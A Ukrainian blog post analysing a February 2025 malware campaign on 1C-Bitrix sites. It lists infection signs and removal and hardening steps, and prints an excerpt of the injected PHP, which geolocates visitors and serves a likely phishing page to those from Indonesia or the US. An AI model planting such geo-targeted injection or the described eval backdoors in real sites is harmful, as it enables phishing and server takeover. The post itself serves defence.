Лютневий вірус на Бітрікс

Замовити послугу
1 хв.
На початку лютого 2025 року в мережі поширився вірус, який вражає сайти на платформі 1С-Бітрікс. Це шкідливе ПЗ вбудовується у файли проекту, створює додаткові директорії та виконує підозрілі дії, включаючи збирання інформації про користувачів та редиректи на зовнішні ресурси. Однак ознаки його активності вказують на модифікацію існуючих атакуючих методик, а не на зовсім новий вид загрози.

Основні ознаки зараження

Створення нових файлів та директорій:

  • У папці `/aspro_regions/robots/` з'являються невідомі файли.
  • У корені сайту додаються файли `robots.connections.php`, `wp-ver.php`, `index.php`.
  • З'являються каталоги з випадковими іменами, наприклад `1a869/`, `a410f/`, що містять підмінені `index.php`.

Зміна головного

  • У файл вбудовується шкідливий код перед підключенням `header.php`.
  • Код використовує обфускацію (base64_encode, goto), що ускладнює його виявлення.

Розбір заражених файлів

1. `index.php`

Файл містить прихований код, який виконує такі дії:

- Отримує IP-адресу користувача.
- Робить запит до сервісу ip-api.com, щоб визначити країну.
- Якщо користувач з Індонезії або США , підключає файл `readme.html`, який може містити фішингову сторінку або редирект.

Приклад шкідливого коду:

 php

$ip = getUserIP();

$api_url = " http://ip-api.com/json/{$ip}" ;

$response = file_get_contents($api_url);

$ data = json_decode ($ response, true);

if ($data["countryCode"] === "ID" || $data["countryCode"] === "US") {

    ob_start();

    include "readme.html";

    $output = ob_get_clean();

    echo $output;

    die;

}

`

2. `wp-ver.php`

Цей файл маскується під систему WordPress (`wp-` у назві), але насправді виконує:

- Створення прихованих backdoor-скриптів.
- Запуск віддалених команд через `eval()` або `base64_decode()`.
- Підключення до зовнішніх серверів передачі даних.

3. `robots.connections.php`

- Цей файл керує зв'язком із зовнішніми серверами.
- Може використовуватись для завантаження нових шкідливих скриптів.
- Найчастіше містить зашифрований чи обфусцированний код.

Ціль вірусу

- **Перехоплення трафіку** (редиректи на фішингові сайти).
- **Крадіжка даних користувачів** (IP, браузер, геолокація).
- **Використання сервера для атак** (спам, DDoS, розміщення фішингових сторінок).

Як захиститись?

1. Перевірити файли та директорії

- Видалити `robots.connections.php`, `wp-ver.php`, невідомі `index.php`.
- Перевірити кореневий `index.php` на наявність шкідливого коду.

2. Оновити CMS та модулі

- Переконайтеся, що ви використовуєте актуальну версію Бітрікс.

3. Обмежити доступ до сервера

- Заборонити виконання `eval()` у PHP-конфігурації.
- Налаштувати `.htaccess` для захисту від завантаження файлів, що виконуються.

4. Перевірити права доступу

- Заборонений запис в `/bitrix/`, `/local/` та `/upload/`.

5. Провести антивірусну перевірку

- Використовувати `AI-Bolit`, `Virusdie`, `ClamAV` для сканування файлів.

Висновок

Цей вірус – серйозна загроза для сайтів на Бітрікс . Важливо регулярно перевіряти файли, стежити за оновленнями та використовувати захисні механізми. Якщо ваш сайт заражений, рекомендується негайно видалити шкідливі файли, провести аудит безпеки та посилити захист.

9 лютого 2025 (Boudybuilder) Виталий Фантич

Повернення до списку

Цей сайт багатомовний
завдяки модулю Мультимовність
file_download Завантажити Модуль Маркет
file_download Завантажити Модуль Маркет